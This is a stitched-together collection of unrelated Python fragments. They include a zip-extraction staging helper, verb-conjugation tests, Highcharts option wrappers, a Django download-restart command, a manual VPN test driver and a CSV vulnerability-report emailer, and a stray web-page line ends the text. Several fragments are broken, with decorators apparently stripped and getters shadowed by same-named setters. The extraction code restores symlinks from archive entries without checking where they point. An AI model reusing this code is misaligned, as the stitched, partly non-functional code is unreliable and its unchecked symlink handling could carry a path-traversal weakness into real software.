        # only allowed while it is still empty.
        if (dst is None):
            if (os.listdir(self._staging) != []):
                raise self.Error('Staging directory is not empty!')
            safe_rmtree(self._staging)
            dst = '.'
        dst = self._normalize(dst)
        self._ensure_not_dst(dst)
        return dst
    def copytree(self, src, dst=None):
        """Recursively copy tree *src* into relative *dst* (or the empty root)."""
        dst = self._resolve_dst_dir(dst)
        shutil.copytree(src, self.absolute(dst))
    def symlink(self, link, dst):
        """Create a symlink at relative *dst* pointing to *link*."""
        dst = self._normalize(dst)
        self._ensure_parent(dst)
        self._ensure_not_dst(dst)
        os.symlink(link, self.absolute(dst))
    def move(self, src, dst):
        """Move external path *src* to relative *dst* (parents created, no clobber)."""
        dst = self._normalize(dst)
        self._ensure_parent(dst)
        self._ensure_not_dst(dst)
        shutil.move(src, self.absolute(dst))
    def exists(self, dst):
        """Whether relative *dst* exists inside the staging dir."""
        dst = self._normalize(dst)
        return os.path.exists(self.absolute(dst))
    def extract(self, zf, dst=None):
        """Extract zipfile *zf* into relative *dst* (or the empty root).

        Restores symlinks and permission bits from the zip's external
        attributes and re-applies per-entry timestamps afterwards.
        """
        dst = self._resolve_dst_dir(dst)
        abs_dst = os.path.join(self._staging, dst)
        timestamps = {}
        for zi in zf.infolist():
            filename = os.path.join(dst, zi.filename)
            destination = self.absolute(filename)
            # Unix mode bits live in the high 16 bits of external_attr.
            mode = (zi.external_attr >> 16)
            if stat.S_ISLNK(mode):
                # Symlink entries store their target as the file contents.
                target = zf.read(zi).decode('utf-8')
                self.symlink(target, filename)
            else:
                self._ensure_parent(filename)
                zf.extract(zi, path=abs_dst)
                os.chmod(destination, stat.S_IMODE(mode))
                if filename.endswith('.pyc'):
                    # .pyc files embed their source mtime; reuse it for both
                    # the .pyc and the matching .py (name minus trailing 'c').
                    new_time = extract_pyc_timestamp(destination)
                    timestamps[destination] = new_time
                    timestamps[destination[:(- 1)]] = new_time
                else:
                    new_time = tuple((list(zi.date_time) + [0, 0, (- 1)]))
                    timestamps[destination] = time.mktime(new_time)
        for (path, timestamp) in timestamps.items():
            try:
                os.utime(path, (timestamp, timestamp))
            except OSError as e:
                # A missing .py sibling for a .pyc is tolerated.
                if (not path.endswith('.py')):
                    raise e
class TestVerbConjugate(TestCase):
    """Tests for the `conjugate` verb-conjugation helpers.

    NOTE(review): each parameterized test below is preceded by a bare
    parenthesized list of (input..., expected) tuples.  These look like
    parameter tables whose decorator name (e.g. ``@parameterized.expand``)
    was lost during extraction — the test methods take exactly the matching
    arguments.  Confirm against the original file and restore the
    decorators; as written, the bare lists are no-op expression statements.
    """

    # (verb, expected infinitive)
    ([('have', 'have'), ('swim', 'swim'), ('give', 'give'), ('given', 'give'), ('am', 'be'), ('doing', 'do'), ('are', 'be')])
    def test_verb_infinitive(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_infinitive(verb))

    # (tense key, verb, expected conjugation)
    ([('inf', 'have', 'have'), ('inf', 'swim', 'swim'), ('inf', 'give', 'give'), ('inf', 'given', 'give'), ('inf', 'am', 'be'), ('inf', 'doing', 'do'), ('inf', 'are', 'be'), ('2sgpres', 'am', 'are'), ('3sgpres', 'am', 'is')])
    def test_verb_conjugate(self, tense, verb, expected):
        self.assertEqual(expected, conjugate.verb_conjugate(verb, tense=tense))

    # (person, verb, expected present form)
    ([('1st', 'have', 'have'), ('1st', 'swim', 'swim'), ('1st', 'give', 'give'), ('1st', 'given', 'give'), ('1st', 'am', 'am'), ('1st', 'doing', 'do'), ('1st', 'are', 'am'), ('2nd', 'were', 'are'), ('3rd', 'am', 'is')])
    def test_verb_present(self, person, verb, expected):
        self.assertEqual(expected, conjugate.verb_present(verb, person=person))

    # (verb, expected present participle)
    ([('have', 'having'), ('swim', 'swimming'), ('give', 'giving'), ('given', 'giving'), ('am', 'being'), ('doing', 'doing'), ('are', 'being')])
    def test_verb_present_participle(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_present_participle(verb))

    # (person, verb, expected past form)
    ([('1st', 'have', 'had'), ('1st', 'swim', 'swam'), ('1st', 'give', 'gave'), ('1st', 'given', 'gave'), ('1st', 'am', 'was'), ('1st', 'doing', 'did'), ('1st', 'are', 'was'), ('2nd', 'were', 'were')])
    def test_verb_past(self, person, verb, expected):
        self.assertEqual(expected, conjugate.verb_past(verb, person=person))

    # (verb, expected past participle)
    ([('have', 'had'), ('swim', 'swum'), ('give', 'given'), ('given', 'given'), ('am', 'been'), ('doing', 'done'), ('are', 'been')])
    def test_verb_past_participle(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_past_participle(verb))

    def test_verb_get_all_tenses(self):
        # verb_all_tenses should expose exactly the keys of the tense table.
        self.assertEqual(list(conjugate.verb_tenses_keys.keys()), conjugate.verb_all_tenses())

    # (verb, expected tense label)
    ([('have', 'infinitive'), ('swim', 'infinitive'), ('give', 'infinitive'), ('given', 'past participle'), ('am', '1st singular present'), ('doing', 'present participle'), ('are', '2nd singular present')])
    def test_verb_tense(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_tense(verb))

    # (tense key, verb, expected boolean)
    ([('inf', 'have', True), ('inf', 'swim', True), ('inf', 'give', True), ('inf', 'given', False), ('inf', 'am', False), ('inf', 'doing', False), ('inf', 'are', False)])
    def test_verb_is_tense(self, tense, verb, expected):
        self.assertEqual(expected, conjugate.verb_is_tense(verb, tense))

    # (person, verb, expected boolean)
    ([('1st', 'have', False), ('1st', 'swim', False), ('1st', 'give', False), ('1st', 'given', False), ('1st', 'am', True), ('1st', 'doing', False), ('1st', 'are', False), ('1st', 'had', False)])
    def test_verb_is_present(self, person, verb, expected):
        self.assertEqual(expected, conjugate.verb_is_present(verb, person=person))

    # (verb, expected boolean)
    ([('have', False), ('swim', False), ('give', False), ('given', False), ('am', False), ('doing', True), ('are', False)])
    def test_verb_is_present_participle(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_is_present_participle(verb))

    # (person, verb, expected boolean)
    ([('1st', 'have', False), ('1st', 'swim', False), ('1st', 'give', False), ('1st', 'given', False), ('1st', 'am', False), ('1st', 'doing', False), ('1st', 'are', False), ('2nd', 'were', True)])
    def test_verb_is_past(self, person, verb, expected):
        self.assertEqual(expected, conjugate.verb_is_past(verb, person=person))

    # (verb, expected boolean)
    ([('have', False), ('swimming', False), ('give', False), ('given', True), ('am', False), ('doing', False), ('are', False), ('had', False)])
    def test_verb_is_past_participle(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_is_past_participle(verb))

    # (verb, expected (plural-actor form, singular-actor form) pair)
    ([('have', ('have', 'has')), ('swimming', ('swimming', 'swimming')), ('give', ('give', 'gives')), ('given', ('given', 'given')), ('am', ('are', 'is')), ('doing', ('doing', 'doing')), ('are', ('are', 'is')), ('had', ('had', 'had')), ('grin', ('grin', 'grins')), ('smile', ('smile', 'smiles')), ('vex', ('vex', 'vexes')), ('thrust', ('thrust', 'thrusts'))])
    def test_verb_actor_stance_components(self, verb, expected):
        self.assertEqual(expected, conjugate.verb_actor_stance_components(verb))
(IDropHandler)  # NOTE(review): bare expression — looks like a stripped decorator (e.g. @provides(IDropHandler)); confirm against the original source.
class FileDropHandler(HasTraits):
    """Drop handler that accepts dropped local files with whitelisted extensions."""

    # Accepted file-name suffixes (e.g. ['.py', '.txt']).
    extensions = List(Str)

    # Callable invoked with the local path of each dropped file.
    open_file = Callable

    def can_handle_drop(self, event, target):
        """Return True if the drag payload holds at least one local file whose
        path ends with one of the configured extensions."""
        mime_data = event.mimeData()
        if not mime_data.hasUrls():
            return False
        suffixes = tuple(self.extensions)
        return any(url.toLocalFile().endswith(suffixes) for url in mime_data.urls())

    def handle_drop(self, event, target):
        """Open every dropped file via the configured `open_file` callable."""
        for dropped in event.mimeData().urls():
            self.open_file(dropped.toLocalFile())
def _plotGaussianKDE(axes: 'Axes', plot_config: 'PlotConfig', data: 'DataFrame', label: str):
    """Plot a Gaussian kernel-density estimate of *data* on *axes*.

    The evaluation grid extends half a sample-range beyond the data on each
    side so the density curve tails off toward zero, and the first plotted
    line is registered as a legend item under *label*.
    """
    style = plot_config.histogramStyle()
    lo = data.min()
    hi = data.max()
    half_span = 0.5 * (hi - lo)
    grid = numpy.linspace(lo - half_span, hi + half_span, 1000)
    density = gaussian_kde(data.values).evaluate(grid)
    lines = axes.plot(grid, density, linewidth=style.width, color=style.color, alpha=style.alpha)
    if lines:
        plot_config.addLegendItem(label, lines[0])
class Command(BaseCommand):
    """Management command that restarts a 'frozen' (stuck) DownloadJob.

    The job is located by ID or by output filename; unless --force is given,
    finished/failed/monthly jobs are rejected before restarting.
    """
    help = ' '.join(["Restart a 'frozen' download job.", " (frozen signifies it didn't complete or fail, and is not a monthly download job)", 'Provide a DownloadJob ID or filename to restart the download process.', 'Depending on environment settings, this will either re-queue the download or process locally'])

    def add_arguments(self, parser):
        # Exactly one lookup key must be provided: an ID or a filename.
        group = parser.add_mutually_exclusive_group(required=True)
        group.add_argument('-i', '--id', dest='download_job_id', type=int, help='A DownloadJob ID from a USAspending DB to restart a download')
        group.add_argument('-f', '--filename', dest='file_name', type=str, help='A string to search on the final zip product filename of a DownloadJob to restart a download')
        parser.add_argument('--force', action='store_true', help='Throw caution into the wind and force that DownloadJob file generation to restart!')

    def handle(self, *args, **options):
        logger.info('Beginning management command')
        self.download = DownloadAdministrator()
        # BUGFIX: the original also called self.get_custom_arguments(**options)
        # on its own line and discarded the result — redundant, removed.
        self.download.search_for_a_download(**self.get_custom_arguments(**options))
        if (not options['force']):
            self.validate_download_job()
        self.download.restart_download_operation()
        logger.info('OK')

    @staticmethod
    def get_custom_arguments(**options):
        """Return only the lookup options (download_job_id / file_name) that were set.

        BUGFIX: declared as @staticmethod — the original took no `self`
        parameter yet was invoked as `self.get_custom_arguments(...)`,
        which would raise TypeError (the bound instance became an
        unexpected positional argument).
        """
        return {field: value for (field, value) in options.items() if ((field in ['download_job_id', 'file_name']) and value)}

    def validate_download_job(self):
        """Abort when the located job is already terminal or is a monthly download."""
        if (self.download.download_job.job_status_id in [JOB_STATUS_DICT['finished'], JOB_STATUS_DICT['failed']]):
            report_and_exit('DownloadJob invalid job_state_id: {}. Aborting'.format(self.download.download_job.job_status_id))
        elif (self.download.download_job.monthly_download is True):
            report_and_exit('DownloadJob is a monthly download. Aborting')
def new_watched_window() -> Generator:
    """Yield a (window, watcher) pair with the watcher already running.

    BUGFIX: teardown is wrapped in ``try/finally`` so the watcher is stopped
    and the window session destroyed even if the consumer raises while the
    generator is suspended at the yield (the original leaked both on error).
    """
    window_session = WindowSession({0: 1})
    window_session.setup()
    watcher = WindowWatcher(window_session.get_first_window())
    watcher.start()
    sleep(0.1)  # give the watcher a moment to start observing
    try:
        (yield (window_session.get_first_window(), watcher))
    finally:
        watcher.stop()
        window_session.destroy()
class OptionPlotoptionsGaugeAccessibilityPoint(Options):
    """Per-point accessibility options for a gauge series (Highcharts wrapper).

    Each option is a getter/setter pair: the no-argument form returns the
    configured value via ``self._config_get(default)``; the one-argument form
    stores it via ``self._config(value, js_type=False)``.

    NOTE(review): every option name is defined twice, so in plain Python the
    setter shadows the getter.  This pattern only works if ``@property`` /
    ``@<name>.setter`` decorators were stripped during extraction — confirm
    and restore against the original source.
    """

    def dateFormat(self):
        # Getter; no default (None).
        return self._config_get(None)

    def dateFormat(self, text: str):
        self._config(text, js_type=False)

    def dateFormatter(self):
        return self._config_get(None)

    def dateFormatter(self, value: Any):
        self._config(value, js_type=False)

    def describeNull(self):
        # Default True: null points are described to screen readers.
        return self._config_get(True)

    def describeNull(self, flag: bool):
        self._config(flag, js_type=False)

    def descriptionFormat(self):
        return self._config_get(None)

    def descriptionFormat(self, text: str):
        self._config(text, js_type=False)

    def descriptionFormatter(self):
        return self._config_get(None)

    def descriptionFormatter(self, value: Any):
        self._config(value, js_type=False)

    def valueDecimals(self):
        return self._config_get(None)

    def valueDecimals(self, num: float):
        self._config(num, js_type=False)

    def valueDescriptionFormat(self):
        # Default format string used when announcing a point's value.
        return self._config_get('{xDescription}{separator}{value}.')

    def valueDescriptionFormat(self, text: str):
        self._config(text, js_type=False)

    def valuePrefix(self):
        return self._config_get(None)

    def valuePrefix(self, text: str):
        self._config(text, js_type=False)

    def valueSuffix(self):
        return self._config_get(None)

    def valueSuffix(self, text: str):
        self._config(text, js_type=False)
class OptionSeriesBellcurveSonificationTracksMappingTime(Options):
    """Time-mapping options for sonification tracks of a bellcurve series.

    Each option is a getter/setter pair backed by ``self._config_get`` /
    ``self._config``.

    NOTE(review): each option name is defined twice, so the setter shadows
    the getter in plain Python — this pattern suggests stripped
    ``@property`` / ``@<name>.setter`` decorators; confirm against the
    original source.
    """

    def mapFunction(self):
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
def get_sizes_from_dtype(dtype):
    """Parse a fixed-point dtype string ``fxp-<sign><n_word>/<n_frac>[-<complex>]``.

    Examples: ``'fxp-s16/8'`` -> (True, 16, 8); ``'fxp-u12/4-complex'`` ->
    (False, 12, 4).

    Returns:
        tuple: ``(signed, n_word, n_frac)`` where *signed* is a bool and the
        sizes are ints.

    Raises:
        ValueError: if *dtype* is not a str or does not match the format.
    """
    if not isinstance(dtype, str):
        raise ValueError('dtype must be a str!')
    # BUGFIX: split only at the FIRST '-'. The original `dtype.split('-')`
    # with a two-target unpack raised "too many values to unpack" for the
    # documented `...-<complex>` form, making the later `'-' in props`
    # branch unreachable.
    (head, _, props) = dtype.partition('-')
    if (head != 'fxp') or (not props):
        raise ValueError('dtype str format must be fxp-<sign><n_word>/<n_frac>-<complex>')
    if (props[0] == 's'):
        signed = True
    elif (props[0] == 'u'):
        signed = False
    else:
        raise ValueError('dtype sign specifier should be `s` or `u`')
    if ('-' in props):
        # Drop the optional trailing '-<complex>' qualifier.
        (props, _) = props.split('-', 1)
    (n_word, n_frac) = props[1:].split('/')
    return (signed, int(n_word), int(n_frac))
class Log():
    """Structured view of a single EVM-trace log entry.

    Maps the camelCase keys of the raw trace dict onto snake_case
    attributes.  All keys are required; a missing key raises KeyError,
    exactly as the original per-key lookups did.
    """

    def __init__(self, *args, **kwargs):
        # attribute name -> key in the raw kwargs dict
        field_map = {
            'pc': 'pc',
            'op': 'op',
            'gas': 'gas',
            'gas_cost': 'gasCost',
            'memory': 'memory',
            'memory_size': 'memSize',
            'stack': 'stack',
            'depth': 'depth',
            'op_name': 'opName',
            'error': 'error',
        }
        for attr, key in field_map.items():
            setattr(self, attr, kwargs[key])
class TASNode(Node):
    """Search-tree node for TAS (Treasury Appropriation Symbol) filtering.

    The node's depth (number of ancestors) determines which database column
    its code is matched against.
    """

    def _basic_search_unit(self):
        """Build the Q filter appropriate to this node's depth in the tree."""
        depth = len(self.ancestors)
        if depth == 2:
            # Leaf level: match the rendered TAS label by case-insensitive regex.
            return Q(tas_rendering_label__iregex=search_regex_of(self.code))
        if depth == 1:
            return Q(federal_account__federal_account_code=self.code)
        return Q(federal_account__parent_toptier_agency__toptier_code=self.code)

    def clone(self, code, positive, positive_naics, negative_naics):
        """Return a new TASNode carrying the given code and filter lists."""
        return TASNode(code, positive, positive_naics, negative_naics)
class RandomAsyncUserSelector(AsyncUserSelector):
    """Async user selector that picks a training user uniformly at random."""

    def __init__(self, data_provider: IFLDataProvider):
        super().__init__(data_provider)

    def get_random_user(self) -> AsyncUserSelectorInfo:
        """Return a uniformly random training user together with its index."""
        chosen_index = np.random.randint(0, self.data_provider.num_train_users())
        chosen_user = self.data_provider.get_train_user(chosen_index)
        return AsyncUserSelectorInfo(user_data=chosen_user, user_index=chosen_index)
class DynamoDBSchema(ConnectionConfigSecretsSchema):
    """Secrets schema describing the credentials needed to connect to AWS DynamoDB."""
    # AWS region hosting the DynamoDB table (e.g. us-west-2).
    region_name: str = Field(title='Region', description='The AWS region where your DynamoDB table is located (ex. us-west-2).')
    aws_access_key_id: str = Field(title='Access Key ID', description='Part of the credentials that provide access to your AWS account.')
    # Marked sensitive so it is masked/encrypted by the secrets machinery.
    aws_secret_access_key: str = Field(title='Secret Access Key', description='Part of the credentials that provide access to your AWS account.', sensitive=True)
    # All three fields are mandatory for a valid connection configuration.
    _required_components: List[str] = ['region_name', 'aws_access_key_id', 'aws_secret_access_key']
class OptionSeriesWindbarbMarker(Options):
    """Point-marker options for a windbarb series (Highcharts wrapper).

    Each option is a getter/setter pair backed by ``self._config_get`` /
    ``self._config``; ``states`` returns a nested sub-configuration object.

    NOTE(review): each option name is defined twice, so the setter shadows
    the getter in plain Python — this pattern suggests stripped
    ``@property`` / ``@<name>.setter`` decorators; confirm against the
    original source.
    """

    def enabled(self):
        return self._config_get(None)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def enabledThreshold(self):
        # Default 2: markers auto-enable when point density allows it.
        return self._config_get(2)

    def enabledThreshold(self, num: float):
        self._config(num, js_type=False)

    def fillColor(self):
        return self._config_get(None)

    def fillColor(self, text: str):
        self._config(text, js_type=False)

    def height(self):
        return self._config_get(None)

    def height(self, num: float):
        self._config(num, js_type=False)

    def lineColor(self):
        # Default marker outline color is white.
        return self._config_get('#ffffff')

    def lineColor(self, text: str):
        self._config(text, js_type=False)

    def lineWidth(self):
        # Default 0: no outline.
        return self._config_get(0)

    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    def radius(self):
        # Default marker radius in pixels.
        return self._config_get(4)

    def radius(self, num: float):
        self._config(num, js_type=False)

    def states(self) -> 'OptionSeriesWindbarbMarkerStates':
        # Nested hover/select state configuration.
        return self._config_sub_data('states', OptionSeriesWindbarbMarkerStates)

    def symbol(self):
        return self._config_get(None)

    def symbol(self, text: str):
        self._config(text, js_type=False)

    def width(self):
        return self._config_get(None)

    def width(self, num: float):
        self._config(num, js_type=False)
class VPNApplication(Component):
    """Manual (human-in-the-loop) driver for a generic VPN application.

    Most operations prompt the tester to perform an action and confirm,
    since this application cannot be automated directly.
    """

    def __init__(self, device, config):
        super().__init__(device, config)
        self._connected = True

    def _get_ips(self, msg, max_ips=0):
        """Prompt the user for IP addresses, one per entry.

        Collection stops on an empty entry, or once ``max_ips`` valid
        addresses have been gathered (``max_ips=0`` means unlimited).
        Invalid entries trigger a warning and a re-prompt.  Returns a list
        of ``ipaddress`` address objects (possibly empty).
        """
        msg = (msg + ' Press enter after each one. When finished, just press enter.')
        collected = []
        while True:
            entry = message_and_await_string(msg)
            if not entry:
                break
            try:
                collected.append(ipaddress.ip_address(entry))
                if max_ips != 0 and len(collected) == max_ips:
                    break
            except (ipaddress.AddressValueError, ValueError) as ex:
                L.warning('{}: invalid IP address. Please re-enter.'.format(ex))
        if not collected:
            L.warning('User did not provide any valid IP addresses')
        return collected

    def open(self):
        """No-op: the user opens the application themselves."""
        pass

    def close(self):
        message_and_await_enter('Close the VPN application')

    def disconnect(self):
        message_and_await_enter('Disconnect from the VPN')

    def connect(self):
        message_and_await_enter('Connect to the VPN')

    def check_configuration(self, config):
        message_and_await_yes_no('Is the VPN application configured as follows:\n{}'.format(config))

    def wait_for_connection_interrupt_detection(self, timeout=65):
        message_and_await_enter('Wait for the VPN application to detect a connection disruption then press enter')

    def configure(self):
        """Ask the user to apply the settings from self._config, honoring skip_settings."""
        skip_settings = self._config.get('skip_settings', True)
        settings = self._config.get('settings', {})
        human_readable = settings.get('human_readable', None)
        if human_readable is not None:
            L.describe('VPN application should be configured to {}'.format(human_readable))
        elif settings:
            L.describe('VPN application should be configured to {}'.format(settings))
        if not settings:
            L.warning('No settings specified for VPN application. Using current settings.')
            return
        elif skip_settings:
            L.warning('Configuring VPN application skipped as skip_settings=True')
            return
        rendered = ''.join(' {} => {}\n'.format(key, value) for (key, value) in list(settings.items()))
        message_and_await_enter('Configure the VPN application with the following settings:\n{}'.format(rendered))

    def preferences(self):
        L.warning("Can't automatically determine preferences for this VPN application")
        return {}

    def tunnel_interface(self):
        return message_and_await_string('Please input the tunnel interface for the VPN or leave blank if unknown')

    def vpn_processes(self):
        L.warning("Can't automatically determine the VPN processes for this VPN application")
        return []

    def vpn_server_ip(self):
        """Return the single VPN server IP entered by the user, or None."""
        ips = self._get_ips('Please input the VPN server IP.', max_ips=1)
        if len(ips) > 1:
            raise XVEx('User provided more than one VPN server IP')
        return ips[0] if ips else None

    def dns_server_ips(self):
        return self._get_ips('Please input the DNS server IPs you expect the VPN app to use.')

    def tunnel_gateway(self):
        return self._get_ips('Please input the tunnel gateway IP.')

    def connection_state(self):
        return 'connected' if self._connected else 'ready'

    def protocol(self):
        return message_and_await_string('Please input the VPN protocol or leave blank if unknown')

    def open_and_connect(self):
        """Convenience: open the application, then connect."""
        self.open()
        self.connect()
def process_csv(csv_file):
    """Load a pipe-delimited vulnerability report into an in-memory SQLite DB,
    then email each distinct user their list of vulnerabilities.

    Expected columns, in order: user, timestamp, appname, version_file,
    file_version, secure_version, cve.

    :param csv_file: path to the pipe-delimited report file.
    """
    conn = sqlite3.connect(':memory:')
    try:
        c = conn.cursor()
        c.execute('CREATE TABLE IF NOT EXISTS vulnerabilities (user TEXT, timestamp TEXT, appname TEXT, version_file TEXT, file_version TEXT, secure_version TEXT, cve TEXT)')
        with open(csv_file, newline='') as csvfile:
            # NOTE(review): quotechar equals the delimiter ('|'), which
            # effectively disables quoting — confirm this matches the
            # producer's output format.
            reader = csv.reader(csvfile, delimiter='|', quotechar='|')
            for line in reader:
                print(line)  # NOTE(review): debug output kept for parity; consider logging instead
                data = (line[0], line[1], line[2], line[3], line[4], line[5], line[6])
                c.execute('INSERT INTO vulnerabilities VALUES (?,?,?,?,?,?,?)', data)
        # Single commit after the load (the original committed per row).
        conn.commit()
        c.execute('SELECT DISTINCT user FROM vulnerabilities')
        users = c.fetchall()
        for user in users:
            t = (user[0],)
            vulnerabilities = []
            # Use a separate cursor so the outer result set is not clobbered.
            rows = conn.cursor()
            for vulnerability in rows.execute('SELECT timestamp, appname, version_file, file_version, secure_version, cve FROM vulnerabilities WHERE user=?', t):
                vulnerabilities.append(vulnerability)
            send_email(user[0], vulnerabilities)
    finally:
        # The original leaked the connection; always release it.
        conn.close()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.